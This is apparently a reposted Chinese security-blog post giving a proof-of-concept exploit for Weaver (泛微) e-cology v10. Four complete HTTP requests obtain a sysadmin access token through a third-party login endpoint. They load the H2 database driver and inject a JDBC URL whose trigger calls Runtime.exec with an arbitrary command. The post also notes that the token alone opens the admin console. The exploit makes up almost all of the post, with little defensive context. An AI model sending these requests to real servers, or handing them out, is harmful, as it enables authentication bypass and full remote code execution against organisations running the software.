泛微 e-cology v10 远程代码执行漏洞 POC

admin 2024年8月20日21:02:58泛微 e-cology v10 远程代码执行漏洞 POC已关闭评论137 views字数 1719阅读5分43秒阅读模式

泛微 e-cology v10 远程代码执行漏洞 POC

漏洞描述

泛微Ecology-10.0存在远程代码执行漏洞,该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过JDBC反序列化和实现RCE,系统必须依赖于 H2 数据库,该POC来自于网络,自行判断。

泛微 e-cology v10 远程代码执行漏洞 POC

漏洞POC

1.获取serviceTicketId

  • POST /papi/passport/rest/appThirdLogin HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 51
username=sysadmin&service=1&ip=1&loginType=third

2.获取data

  • POST /papi/passport/login/generateEteamsId HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 56
stTicket={{serviceTicketId}}

3.加载 org.h2.Driver 数据库驱动类

POST /api/bs/iaauthclient/base/save HTTP/1.1Host: Content-Length: 86User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://ipReferer: http://ip/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeETEAMSID: {{data}}
{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}

4.执行系统命令

POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1Host: Content-Length: 199User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://ipReferer: http://ip/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeETEAMSID:  {{data}}
{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"{cmd}\")$$"}

也可以通过上面第一步、第二步获取ETEAMSID值直接进入后台管理页面。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月20日21:02:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 e-cology v10 远程代码执行漏洞 POChttps://cn-sec.com/archives/3082678.html